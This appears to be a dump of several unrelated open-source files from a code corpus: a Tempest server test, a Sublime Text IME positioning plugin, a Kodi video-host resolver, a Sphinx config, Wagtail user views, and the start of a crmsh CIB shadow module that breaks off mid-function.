self.addCleanup(self.client.delete_server, test_server['id'])
self.client.wait_for_server_status(test_server['id'], 'ACTIVE')
server = self.client.show_server(test_server['id'])
self.assertEqual(server['status'], 'ACTIVE')
hostname = server[self._host_key]
params = {'host': hostname}
body = self.client.list_servers(params)
servers = body['servers']
nonexistent_params = {'host': 'nonexistent_host'}
nonexistent_body = self.client.list_servers(nonexistent_params)
nonexistent_servers = nonexistent_body['servers']
self.assertIn(test_server['id'], map(lambda x: x['id'], servers))
self.assertNotIn(test_server['id'],
map(lambda x: x['id'], nonexistent_servers))
@test.idempotent_id('ee8ae470-db70-474d-b752-690b7892cab1')
def test_reset_state_server(self):
# Reset server's state to 'error'
self.client.reset_state(self.s1_id)
# Verify server's state
server = self.client.show_server(self.s1_id)
self.assertEqual(server['status'], 'ERROR')
# Reset server's state to 'active'
self.client.reset_state(self.s1_id, state='active')
# Verify server's state
server = self.client.show_server(self.s1_id)
self.assertEqual(server['status'], 'ACTIVE')
@decorators.skip_because(bug="1240043")
@test.idempotent_id('31ff3486-b8a0-4f56-a6c0-aab460531db3')
def test_get_server_diagnostics_by_admin(self):
# Retrieve server diagnostics by admin user
diagnostic = self.client.get_server_diagnostics(self.s1_id)
basic_attrs = ['rx_packets', 'rx_errors', 'rx_drop',
'tx_packets', 'tx_errors', 'tx_drop',
'read_req', 'write_req', 'cpu', 'memory']
for key in basic_attrs:
self.assertIn(key, str(diagnostic.keys()))
@test.idempotent_id('682cb127-e5bb-4f53-87ce-cb9003604442')
def test_rebuild_server_in_error_state(self):
# The server in error state should be rebuilt using the provided
# image and changed to ACTIVE state
# resetting vm state require admin privilege
self.client.reset_state(self.s1_id, state='error')
rebuilt_server = self.non_admin_client.rebuild(
self.s1_id, self.image_ref_alt)
self.addCleanup(self.non_admin_client.wait_for_server_status,
self.s1_id, 'ACTIVE')
self.addCleanup(self.non_admin_client.rebuild, self.s1_id,
self.image_ref)
# Verify the properties in the initial response are correct
self.assertEqual(self.s1_id, rebuilt_server['id'])
rebuilt_image_id = rebuilt_server['image']['id']
self.assertEqual(self.image_ref_alt, rebuilt_image_id)
self.assertEqual(self.flavor_ref, rebuilt_server['flavor']['id'])
self.non_admin_client.wait_for_server_status(rebuilt_server['id'],
'ACTIVE',
raise_on_error=False)
# Verify the server properties after rebuilding
server = self.non_admin_client.show_server(rebuilt_server['id'])
rebuilt_image_id = server['image']['id']
self.assertEqual(self.image_ref_alt, rebuilt_image_id)
@test.idempotent_id('7a1323b4-a6a2-497a-96cb-76c07b945c71')
def test_reset_network_inject_network_info(self):
# Reset Network of a Server
server = self.create_test_server(wait_until='ACTIVE')
self.client.reset_network(server['id'])
# Inject the Network Info into Server
self.client.inject_network_info(server['id'])
@test.idempotent_id('fdcd9b33-0903-4e00-a1f7-b5f6543068d6')
def test_create_server_with_scheduling_hint(self):
# Create a server with scheduler hints.
hints = {
'same_host': self.s1_id
}
self.create_test_server(sched_hints=hints,
wait_until='ACTIVE')
| apache-2.0 | 1,860,584,231,885,031,200 | 42.969849 | 79 | 0.631886 | false |
koery/win-sublime | Data/Packages/IMESupport/imesupportplugin.py | 1 | 18485 | # -*- coding: utf-8 -*-
import sublime
import sublime_plugin
import math
try:
from imesupport.sublime_utility import fix_cloned_view
except ImportError:
from .imesupport.sublime_utility import fix_cloned_view
import ctypes
from ctypes import windll, byref
from ctypes import Structure, c_ulong
from ctypes.wintypes import RECT, POINT
from ctypes.wintypes import BYTE, LONG
WM_IME_STARTCOMPOSITION = 269
WM_IME_ENDCOMPOSITION = 270
WM_IME_COMPOSITION = 271
GWL_STYLE = (-16)
WS_OVERLAPPED = 0
WS_POPUP = -2147483648
WS_CHILD = 1073741824
WS_MINIMIZE = 536870912
WS_VISIBLE = 268435456
WS_DISABLED = 134217728
WS_CLIPSIBLINGS = 67108864
WS_CLIPCHILDREN = 33554432
WS_MAXIMIZE = 16777216
WS_CAPTION = 12582912
WS_BORDER = 8388608
WS_DLGFRAME = 4194304
WS_VSCROLL = 2097152
WS_HSCROLL = 1048576
WS_SYSMENU = 524288
WS_THICKFRAME = 262144
WS_GROUP = 131072
WS_TABSTOP = 65536
WS_MINIMIZEBOX = 131072
WS_MAXIMIZEBOX = 65536
def add(a, b):
return (a[0] + b[0], a[1] + b[1])
def sub(a, b):
return (a[0] - b[0], a[1] - b[1])
def mul(a, b):
return (a[0] * b[0], a[1] * b[1])
class COMPOSITIONFORM(Structure):
_fields_ = [
('dwStyle', c_ulong),
('ptCurrentPos', POINT),
('rcArea', RECT),
]
# from http://d.hatena.ne.jp/pipehead/20071210
import sys
(major, platform) = sys.getwindowsversion()[0:4:3]
winNT5OrLater = (platform == 2) and (major >= 5)
LF_FACESIZE = 32
class c_tchar(ctypes._SimpleCData):
if winNT5OrLater:
_type_ = 'u' # c_wchar
else:
_type_ = 'c' # c_char
class LOGFONT(Structure):
_fields_ = [
('lfHeight', LONG),
('lfWidth', LONG),
('lfEscapement', LONG),
('lfOrientation', LONG),
('lfWeight', LONG),
('lfItalic', BYTE),
('lfUnderline', BYTE),
('lfStrikeOut', BYTE),
('lfCharSet', BYTE),
('lfOutPrecision', BYTE),
('lfClipPrecision', BYTE),
('lfQuality', BYTE),
('lfPitchAndFamily', BYTE),
('lfFaceName', c_tchar * LF_FACESIZE)
]
window_style_bits = {
'WS_POPUP': WS_POPUP,
'WS_CHILD': WS_CHILD,
'WS_MINIMIZE': WS_MINIMIZE,
'WS_VISIBLE': WS_VISIBLE,
'WS_DISABLED': WS_DISABLED,
'WS_CLIPSIBLINGS': WS_CLIPSIBLINGS,
'WS_CLIPCHILDREN': WS_CLIPCHILDREN,
'WS_MAXIMIZE': WS_MAXIMIZE,
'WS_CAPTION': WS_CAPTION,
'WS_BORDER': WS_BORDER,
'WS_DLGFRAME': WS_DLGFRAME,
'WS_VSCROLL': WS_VSCROLL,
'WS_HSCROLL': WS_HSCROLL,
'WS_SYSMENU': WS_SYSMENU,
'WS_THICKFRAME': WS_THICKFRAME,
'WS_GROUP': WS_GROUP,
'WS_TABSTOP': WS_TABSTOP,
'WS_MINIMIZEBOX': WS_MINIMIZEBOX,
'WS_MAXIMIZEBOX': WS_MAXIMIZEBOX,
}
def get_window_style(hwnd):
style = ctypes.windll.user32.GetWindowLongW(hwnd, GWL_STYLE)
ret = []
for name, bit in window_style_bits.items():
if (style & bit) != 0:
ret.append(name)
return ret
def is_fullscreen(hwnd):
style = get_window_style(hwnd)
return 'WS_BORDER' not in style
def is_ime_opened(hwnd, status):
hIMC = ctypes.windll.imm32.ImmGetContext(hwnd)
try:
return bool(ctypes.windll.imm32.ImmGetOpenStatus(hIMC))
finally:
ctypes.windll.imm32.ImmReleaseContext(hwnd, hIMC)
def set_ime_status(hwnd, status):
hIMC = ctypes.windll.imm32.ImmGetContext(hwnd)
try:
if status == True: # IME on
ctypes.windll.imm32.ImmSetOpenStatus(hIMC, 0)
elif status == False: # IME off
ctypes.windll.imm32.ImmSetOpenStatus(hIMC, 1)
elif status == 'toggle': # IME toggle
status = ctypes.windll.imm32.ImmGetOpenStatus(hIMC)
ctypes.windll.imm32.ImmSetOpenStatus(hIMC, 0 if status else 1)
finally:
ctypes.windll.imm32.ImmReleaseContext(hwnd, hIMC)
def set_inline_position(hwnd, x, y, font_face, font_height):
# borrowed from http://d.hatena.ne.jp/doloopwhile/20090627/1275176169
hIMC = windll.imm32.ImmGetContext(hwnd)
status = windll.imm32.ImmGetOpenStatus(hIMC)
if not status:
# Enable IME temporary.
ctypes.windll.imm32.ImmSetOpenStatus(hIMC, 1)
pt = POINT(x, y)
cf = COMPOSITIONFORM()
cf.dwStyle = 2 # CFS_POINT
cf.ptCurrentPos = pt
# Supporting Weasel IME
# For more detail see also WeaselIME.cpp@WeaselIME::_SetCompositionWindow
cf.rcArea.left = x
cf.rcArea.top = y
if x == 0:
cf.rcArea.left = 1
if y == 0:
cf.rcArea.top = 1
cf.rcArea.right = cf.rcArea.left
cf.rcArea.bottom = cf.rcArea.top
windll.imm32.ImmSetCompositionWindow(hIMC, byref(cf))
lf = LOGFONT()
lf.lfHeight = font_height
lf.lfFaceName = font_face
windll.imm32.ImmSetCompositionFontW(hIMC, byref(lf))
if not status:
ctypes.windll.imm32.ImmSetOpenStatus(hIMC, 0)
windll.imm32.ImmReleaseContext(hwnd, hIMC)
class WindowLayout(object):
def __init__(self, window):
self.window = window
self.last_extents = None
self.settings = sublime.load_settings('IMESupport.sublime-settings')
def calc_cursor_position(self, view, cursor):
abspoint = view.text_to_layout(cursor)
offset = view.viewport_position()
p = sub(abspoint, offset)
offset = self.calc_offset(self.window, view)
if self.side_bar['visible']:
offset[0].append(self.side_bar['width'])
offset[0].append(self.get_setting('imesupport_offset_x'))
offset[1].append(self.get_setting('imesupport_offset_y'))
p = add(p, (sum(offset[0]), sum(offset[1])))
if self.get_setting('imesupport_debug'):
sublime.status_message('IMESupport: ' + str(p) + repr(offset))
font_face, font_height = self.get_font_info(view)
return (int(p[0]), int(p[1]), font_face, font_height)
def get_widget_cursor_position(self, view, cursor):
font_face, font_height = self.get_font_info(view)
# FIXME Is there a way to get cursor position of widget view?
return (0, 0, font_face, font_height)
@staticmethod
def get_font_info(view):
font_face = view.settings().get('font_face', '')
font_height = int(view.line_height())
font_height -= (view.settings().get("line_padding_top", 0)
+ view.settings().get("line_padding_bottom", 0))
return (font_face, font_height)
def update_status(self, view=None):
extents = self.get_extent_list(self.window)
if extents == self.last_extents:
return # layout is not changed.
self.last_extents = extents
# Get status.
self.get_status(view)
def get_status(self, view=None):
window = self.window
if view is None:
view = window.active_view()
if view is None:
return None
self.tabs = self.tabs_status(window, view)
self.distraction_free = self.distraction_free_status(window)
self.split_group = self.split_group_status(window)
# Requires distraction_free
line_numbers = self.line_numbers_status(view)
hscroll_bar = self.hscroll_bar_status(view)
# Requires minimap
self.side_bar = self.side_bar_status(window, view)
return {
'em_width': view.em_width(),
'tabs': self.tabs,
'distraction_free': self.distraction_free,
'split_group': self.split_group,
'line_numbers': line_numbers,
'hscroll_bar': hscroll_bar,
'side_bar': self.side_bar,
}
def get_setting(self, key, default=None):
return self.settings.get(key, default)
def calc_offset(self, window, view):
group, _ = window.get_view_index(view)
layout = window.get_layout()
_, c = self.get_layout_rowcol(layout)
g2d = self.make_list2d(self.get_group_list(window), c)
row, col = self.get_group_rowcol(layout, group)
offset = [[], []]
offset[0] += self.calc_group_offset_width(g2d, col)
offset[1] += self.calc_group_offset_height(g2d, row)
offset[0] += self.calc_view_width_offset(view)
offset[1] += self.calc_view_height_offset(view)
return offset
def split_group_status(self, window):
layout = window.get_layout()
_, c = self.get_layout_rowcol(layout)
views = self.get_group_list(window)
non_view = {'visible': False, 'width': 0}
minimaps = [
self.minimap_status(window, view) if view is not None else non_view
for view in views]
groups = [{'minimap': minimap} for minimap in minimaps]
return self.make_list2d(groups, c)
def side_bar_status(self, window, view):
layout = window.get_layout()
_, c = self.get_layout_rowcol(layout)
g2d = self.make_list2d(self.get_group_list(window), c)
all_views_width = sum(self.calc_group_offset_width(g2d, c))
rect = RECT()
windll.user32.GetClientRect(c_ulong(window.hwnd()), byref(rect))
width = rect.right - all_views_width
if width < 0:
width = 0
return {'visible': width > 0, 'width': width}
def calc_group_offset_width(self, g2d, group_col):
r = len(g2d)
ret = []
for x in range(group_col):
for y in range(r):
if g2d[y][x] is not None:
ret += self.calc_view_width(g2d[y][x], y, x)
break
else:
if self.get_setting('imesupport_debug'):
print('WindowLayout.calc_group_offset_width: there is empty view.')
return ret
def calc_group_offset_height(self, g2d, group_row):
c = len(g2d[0])
ret = []
for y in range(group_row):
for x in range(c):
if g2d[y][x] is not None:
ret += self.calc_view_height(g2d[y][x])
break
else:
if self.get_setting('imesupport_debug'):
print('WindowLayout.calc_group_offset_height: there is empty view.')
return ret
def calc_view_width_offset(self, view):
if self.distraction_free['status']:
extent = view.viewport_extent()
layout = view.layout_extent()
min_width = self.get_setting('imesupport_view_left_distraction_free_width')
left_width = max(extent[0] - layout[0], min_width) / 2
left_width += 4
else:
left_width = self.get_setting('imesupport_view_left_icon_width')
line_numbers = self.line_numbers_status(view)
return [
left_width,
(line_numbers['width'] if line_numbers['visible'] else 0)
]
def calc_view_width(self, view, row, col):
minimap = self.split_group[row][col]['minimap']
return self.calc_view_width_offset(view) + [
view.viewport_extent()[0],
(minimap['width'] if minimap['visible'] else 0),
self.get_setting('imesupport_view_right_vscroll_width')
]
def calc_view_height_offset(self, view):
return [self.tabs['height'] if self.tabs['visible'] else 0]
def calc_view_height(self, view):
hscroll_bar = self.hscroll_bar_status(view)
return self.calc_view_height_offset(view) + [
view.viewport_extent()[1],
(hscroll_bar['height'] if hscroll_bar['visible'] else 0)
]
def line_numbers_status(self, view):
# NOTE line numbers is always hidden on Distraction Free Mode.
if self.distraction_free['status']:
# print(imesupportplugin.WindowLayout.line_numbers_status(window.active_view_in_group(0)))
return {'visible': False, 'width': 0, 'mode': 'distraction_free'}
else:
visible = view.settings().get('line_numbers')
width = (WindowLayout.calc_line_numbers_width(view) + 3
if visible else 0)
return {'visible': visible, 'width': width, 'mode': 'calc'}
def hscroll_bar_status(self, view):
word_wrap = view.settings().get('word_wrap')
extent = view.viewport_extent()
layout = view.layout_extent()
diff = layout[0] - extent[0]
return {
'visible': diff > 0 and word_wrap != True,
'height': self.get_setting('imesupport_view_bottom_hscroll_height'),
# 'diff': self.hscroll_bar_diff(view),
}
@staticmethod
def get_group_list(window):
return [window.active_view_in_group(g) for g in range(window.num_groups())]
@staticmethod
def get_extent_list(window):
view_groups = [window.active_view_in_group(g) for g in range(window.num_groups())]
return [None if v is None else v.viewport_extent() for v in view_groups]
@staticmethod
def tabs_status(window, view):
extent1 = view.viewport_extent()
window.run_command('toggle_tabs')
extent2 = view.viewport_extent()
window.run_command('toggle_tabs')
diff = extent2[1] - extent1[1]
return {'visible': diff > 0, 'height': abs(diff)}
@staticmethod
def minimap_status(window, view):
extent1 = view.viewport_extent()
window.run_command('toggle_minimap')
extent2 = view.viewport_extent()
window.run_command('toggle_minimap')
diff = extent2[0] - extent1[0]
return {'visible': diff > 0, 'width': abs(diff)}
@staticmethod
def is_side_bar_visible(window, view):
extent1 = view.viewport_extent()
window.run_command('toggle_side_bar')
extent2 = view.viewport_extent()
window.run_command('toggle_side_bar')
diff = extent2[0] - extent1[0]
# NOTE Cannot use diff for side_bar width.
return {'visible': diff > 0}
@staticmethod
def distraction_free_status(window):
""" Detecte Distraction Free Mode. """
return {'status': is_fullscreen(window.hwnd())}
@staticmethod
def line_numbers_diff(view):
# FIXME Cannot get with non-active group.
visible = view.settings().get('line_numbers')
extent1 = view.viewport_extent()
view.settings().set('line_numbers', not visible)
extent2 = view.viewport_extent()
view.settings().set('line_numbers', visible)
return extent2[0] - extent1[0]
@staticmethod
def hscroll_bar_diff(view):
# FIXME Cannot get with non-active group.
word_wrap = view.settings().get('word_wrap')
# Make hscroll bar visible if line is longer than viewport.
view.settings().set('word_wrap', False)
extent1 = view.viewport_extent()
# Hide hscroll bar.
view.settings().set('word_wrap', True)
extent2 = view.viewport_extent()
view.settings().set('word_wrap', word_wrap)
diff = extent2[1] - extent1[1]
return {'visible': diff > 0, 'height': abs(diff)}
@staticmethod
def get_layout_rowcol(layout):
c = len(layout['cols']) - 1
r = len(layout['rows']) - 1
return (r, c)
@staticmethod
def get_group_rowcol(layout, group):
c = len(layout['cols']) - 1
return (group // c, group % c)
@staticmethod
def make_list2d(lst, cols):
assert (len(lst) % cols) == 0
return [lst[i * cols:(i + 1) * cols] for i in range(len(lst) // cols)]
@staticmethod
def get_number_column(n):
return int(math.log10(n)) + 1
@staticmethod
def calc_line_numbers_width(view):
lines, _ = view.rowcol(view.size())
c = WindowLayout.get_number_column(lines + 1)
return c * view.em_width()
class ImeSupportEventListener(sublime_plugin.EventListener):
def __init__(self):
self.layouts = {}
self.initialized = False
def on_activated(self, view):
self.update(view)
@fix_cloned_view
def on_selection_modified(self, view):
self.update(view)
def update(self, view):
if not self.initialized:
setup()
self.initialized = True
if view is None:
return
window = view.window()
if window is None:
return
id = window.id()
if id not in self.layouts:
self.layouts[id] = WindowLayout(window)
if view.settings().get('is_widget'):
pos = self.layouts[id].get_widget_cursor_position(view, view.sel()[0].a)
else:
self.layouts[id].update_status(view)
pos = self.layouts[id].calc_cursor_position(view, view.sel()[0].a)
set_pos(window.hwnd(), pos)
class ImeSupportGetMeasureCommand(sublime_plugin.WindowCommand):
def run(self):
self.test(self.window, self.window.active_view())
@staticmethod
def test(window, view):
print('ImeSupportGetMeasureCommand:')
for k, v in WindowLayout(window).get_status().items():
print(k + ': ' + str(v))
if sublime.load_settings('IMESupport.sublime-settings').get('imesupport_debug'):
class _WindowLayoutTestEventListener(sublime_plugin.EventListener):
def __init__(self):
window = sublime.active_window()
if window is None:
return
view = window.active_view()
if view is None:
return
ImeSupportGetMeasureCommand.test(window, view)
class ImeSupportSetImeStatusCommand(sublime_plugin.TextCommand):
def run(self, edit, status):
set_ime_status(self.view.window().hwnd(), status)
try:
from imesupport import globalhook
except ImportError:
from .imesupport import globalhook
# def unload_handler():
# print('ImeSupport: unload')
# globalhook.term()
def setup():
if int(sublime.version()) < 3000:
# Sublime Text 2 & Python 2.6
pass
else:
# Sublime Text 3 & Python 3.3
globalhook.setup(sublime.arch() == 'x64')
def set_pos(hwnd, pos):
if int(sublime.version()) < 3000:
set_pos_st2(hwnd, pos)
else:
set_pos_st3(hwnd, pos)
def set_pos_st2(hwnd, pos):
# set position directly here. (Not handle IME messages.)
set_inline_position(hwnd, *pos)
def set_pos_st3(hwnd, pos):
globalhook.set_inline_position(hwnd, *pos)
| mit | -7,997,261,403,739,738,000 | 30.598291 | 102 | 0.593995 | false |
noba3/KoTos | addons/plugin.video.phstreams/resources/lib/resolvers/grifthost.py | 3 | 2065 | # -*- coding: utf-8 -*-
'''
Genesis Add-on
Copyright (C) 2015 lambda
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
import re,urllib
from resources.lib.libraries import client
from resources.lib.libraries import jsunpack
def resolve(url):
try:
headers = '|%s' % urllib.urlencode({'User-Agent': client.agent(), 'Referer': url})
url = url.replace('/embed-', '/')
url = re.compile('//.+?/([\w]+)').findall(url)[0]
url = 'http://grifthost.com/embed-%s.html' % url
result = client.request(url)
try:
post = {}
f = client.parseDOM(result, 'Form', attrs = {'method': 'POST'})[0]
f = f.replace('"submit"', '"hidden"')
k = client.parseDOM(f, 'input', ret='name', attrs = {'type': 'hidden'})
for i in k: post.update({i: client.parseDOM(f, 'input', ret='value', attrs = {'name': i})[0]})
post = urllib.urlencode(post)
result = client.request(url, post=post)
except:
pass
result = re.compile('(eval.*?\)\)\))').findall(result)[-1]
result = jsunpack.unpack(result)
url = client.parseDOM(result, 'embed', ret='src')
url += re.compile("file *: *[\'|\"](.+?)[\'|\"]").findall(result)
url = [i for i in url if not i.endswith('.srt')]
url = 'http://' + url[0].split('://', 1)[-1]
url += headers
return url
except:
return
| gpl-2.0 | -3,521,125,499,870,504,000 | 32.852459 | 106 | 0.588862 | false |
pombreda/director | docs/conf.py | 1 | 5855 | # -*- coding: utf-8 -*-
#
# Director documentation build configuration file, created by
# sphinx-quickstart on Sat Sep 27 13:23:22 2008.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# The contents of this file are pickled, so don't put values in the namespace
# that aren't pickleable (module imports are okay, they're removed
# automatically).
#
# All configuration values have a default value; values that are commented out
# serve to show the default value.
import sys
import os
# If your extensions are in another directory, add it here. If the directory
# is relative to the documentation root, use os.path.abspath to make it
# absolute, like shown here.
#sys.path.append(os.path.abspath('some/directory'))
sys.path.insert(0, os.path.abspath('../src'))
sys.path.insert(1, os.path.abspath('../tests'))
from director import __version__, __author__
# General configuration
# ---------------------
# Add any Sphinx extension module names here, as strings.
# They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['.templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# General substitutions.
project = 'Director'
copyright = "2008, %s" % __author__
# The default replacements for |version| and |release|, also used in various
# other places throughout the built documents.
#
# The short X.Y version.
version = __version__
# The full version, including alpha/beta/rc tags.
release = __version__
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
today_fmt = '%B %d, %Y'
# List of documents that shouldn't be included in the build.
#unused_docs = []
# List of directories, relative to source directories, that shouldn't be
# searched for source files.
#exclude_dirs = []
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# Options for HTML output
# -----------------------
# The style sheet to use for HTML and HTML Help pages. A file of that name
# must exist either in Sphinx' static/ path, or in one of the custom paths
# given in html_static_path.
html_style = 'default.css'
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (within the static path) to place at the top of
# the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
#html_static_path = ['.static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_use_modindex = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, the reST sources are included in the HTML build as _sources/<name>.
#html_copy_source = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# If nonempty, this is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = ''
# Output file base name for HTML help builder.
htmlhelp_basename = 'Directordoc'
# Options for LaTeX output
# ------------------------
# The paper size ('letter' or 'a4').
#latex_paper_size = 'letter'
# The font size ('10pt', '11pt' or '12pt').
#latex_font_size = '10pt'
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, document class
# [howto/manual]).
latex_documents = [
('index', 'Director.tex', 'Director Documentation',
__author__, 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# Additional stuff for the LaTeX preamble.
#latex_preamble = ''
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_use_modindex = True
| gpl-3.0 | -3,505,479,435,465,421,000 | 29.65445 | 79 | 0.715628 | false |
Toshakins/wagtail | wagtail/wagtailusers/views/users.py | 6 | 6214 | from __future__ import absolute_import, unicode_literals
from django.conf import settings
from django.contrib.auth import get_user_model
from django.core.exceptions import ImproperlyConfigured
from django.core.urlresolvers import reverse
from django.db.models import Q
from django.shortcuts import get_object_or_404, redirect, render
from django.utils.module_loading import import_string
from django.utils.translation import ugettext as _
from django.views.decorators.vary import vary_on_headers
from wagtail.utils.pagination import paginate
from wagtail.wagtailadmin import messages
from wagtail.wagtailadmin.forms import SearchForm
from wagtail.wagtailadmin.utils import (
any_permission_required, permission_denied, permission_required)
from wagtail.wagtailcore.compat import AUTH_USER_APP_LABEL, AUTH_USER_MODEL_NAME
from wagtail.wagtailusers.forms import UserCreationForm, UserEditForm
from wagtail.wagtailusers.utils import user_can_delete_user
User = get_user_model()
# Typically we would check the permission 'auth.change_user' (and 'auth.add_user' /
# 'auth.delete_user') for user management actions, but this may vary according to
# the AUTH_USER_MODEL setting
add_user_perm = "{0}.add_{1}".format(AUTH_USER_APP_LABEL, AUTH_USER_MODEL_NAME.lower())
change_user_perm = "{0}.change_{1}".format(AUTH_USER_APP_LABEL, AUTH_USER_MODEL_NAME.lower())
delete_user_perm = "{0}.delete_{1}".format(AUTH_USER_APP_LABEL, AUTH_USER_MODEL_NAME.lower())
def get_custom_user_form(form_setting):
try:
return import_string(getattr(settings, form_setting))
except ImportError:
raise ImproperlyConfigured(
"%s refers to a form '%s' that is not available" %
(form_setting, getattr(settings, form_setting))
)
def get_user_creation_form():
form_setting = 'WAGTAIL_USER_CREATION_FORM'
if hasattr(settings, form_setting):
return get_custom_user_form(form_setting)
else:
return UserCreationForm
def get_user_edit_form():
form_setting = 'WAGTAIL_USER_EDIT_FORM'
if hasattr(settings, form_setting):
return get_custom_user_form(form_setting)
else:
return UserEditForm
@any_permission_required(add_user_perm, change_user_perm, delete_user_perm)
@vary_on_headers('X-Requested-With')
def index(request):
q = None
is_searching = False
model_fields = [f.name for f in User._meta.get_fields()]
if 'q' in request.GET:
form = SearchForm(request.GET, placeholder=_("Search users"))
if form.is_valid():
q = form.cleaned_data['q']
is_searching = True
conditions = Q()
if 'username' in model_fields:
conditions |= Q(username__icontains=q)
if 'first_name' in model_fields:
conditions |= Q(first_name__icontains=q)
if 'last_name' in model_fields:
conditions |= Q(last_name__icontains=q)
if 'email' in model_fields:
conditions |= Q(email__icontains=q)
users = User.objects.filter(conditions)
else:
form = SearchForm(placeholder=_("Search users"))
if not is_searching:
users = User.objects.all()
if 'last_name' in model_fields and 'first_name' in model_fields:
users = users.order_by('last_name', 'first_name')
if 'ordering' in request.GET:
ordering = request.GET['ordering']
if ordering == 'username':
users = users.order_by(User.USERNAME_FIELD)
else:
ordering = 'name'
paginator, users = paginate(request, users)
if request.is_ajax():
return render(request, "wagtailusers/users/results.html", {
'users': users,
'is_searching': is_searching,
'query_string': q,
'ordering': ordering,
})
else:
return render(request, "wagtailusers/users/index.html", {
'search_form': form,
'users': users,
'is_searching': is_searching,
'ordering': ordering,
'query_string': q,
})
@permission_required(add_user_perm)
def create(request):
if request.method == 'POST':
form = get_user_creation_form()(request.POST, request.FILES)
if form.is_valid():
user = form.save()
messages.success(request, _("User '{0}' created.").format(user), buttons=[
messages.button(reverse('wagtailusers_users:edit', args=(user.pk,)), _('Edit'))
])
return redirect('wagtailusers_users:index')
else:
messages.error(request, _("The user could not be created due to errors."))
else:
form = get_user_creation_form()()
return render(request, 'wagtailusers/users/create.html', {
'form': form,
})
@permission_required(change_user_perm)
def edit(request, user_id):
user = get_object_or_404(User, pk=user_id)
can_delete = user_can_delete_user(request.user, user)
if request.method == 'POST':
form = get_user_edit_form()(request.POST, request.FILES, instance=user)
if form.is_valid():
user = form.save()
messages.success(request, _("User '{0}' updated.").format(user), buttons=[
messages.button(reverse('wagtailusers_users:edit', args=(user.pk,)), _('Edit'))
])
return redirect('wagtailusers_users:index')
else:
messages.error(request, _("The user could not be saved due to errors."))
else:
form = get_user_edit_form()(instance=user)
return render(request, 'wagtailusers/users/edit.html', {
'user': user,
'form': form,
'can_delete': can_delete,
})
@permission_required(delete_user_perm)
def delete(request, user_id):
user = get_object_or_404(User, pk=user_id)
if not user_can_delete_user(request.user, user):
return permission_denied(request)
if request.method == 'POST':
user.delete()
messages.success(request, _("User '{0}' deleted.").format(user))
return redirect('wagtailusers_users:index')
return render(request, "wagtailusers/users/confirm_delete.html", {
'user': user,
})
| bsd-3-clause | 3,845,206,048,990,028,000 | 33.331492 | 95 | 0.638236 | false |
ingted/crmsh | modules/ui_cib.py | 1 | 8787 | # Copyright (C) 2008-2011 Dejan Muhamedagic <[email protected]>
# Copyright (C) 2013 Kristoffer Gronlund <[email protected]>
# See COPYING for license information.
import os
import glob
from . import command
from . import xmlutil
from . import utils
from . import ui_cibstatus
from . import constants
from . import config
from . import options
from .msg import no_prog_err
from .cibstatus import cib_status
from .cibconfig import cib_factory
from . import tmpfiles
from . import completers as compl
_NEWARGS = ('force', '--force', 'withstatus', 'empty')
class CibShadow(command.UI):
'''
CIB shadow management class
'''
name = "cib"
extcmd = ">/dev/null </dev/null crm_shadow -b"
extcmd_stdout = "</dev/null crm_shadow -b"
def requires(self):
if not utils.is_program('crm_shadow'):
no_prog_err('crm_shadow')
return False
return True
@command.level(ui_cibstatus.CibStatusUI)
def do_cibstatus(self):
pass
@command.skill_level('administrator')
@command.completers_repeating(compl.null, compl.choice(_NEWARGS))
def do_new(self, context, *args):
"usage: new [<shadow_cib>] [withstatus] [force] [empty]"
argl = list(args)
opt_l = utils.fetch_opts(argl, ["force", "--force", "withstatus", "empty"])
if len(argl) > 1:
context.fatal_error("Unexpected argument(s): " + ' '.join(argl))
name = None
if argl:
name = argl[0]
if not utils.is_filename_sane(name):
context.fatal_error("Bad filename: " + name)
if name in (constants.tmp_cib_prompt, constants.live_cib_prompt):
context.fatal_error("Shadow name '%s' is not allowed" % (name))
del argl[0]
constants.tmp_cib = False
else:
fd, fname = tmpfiles.create(dir=xmlutil.cib_shadow_dir(), prefix="shadow.crmsh_")
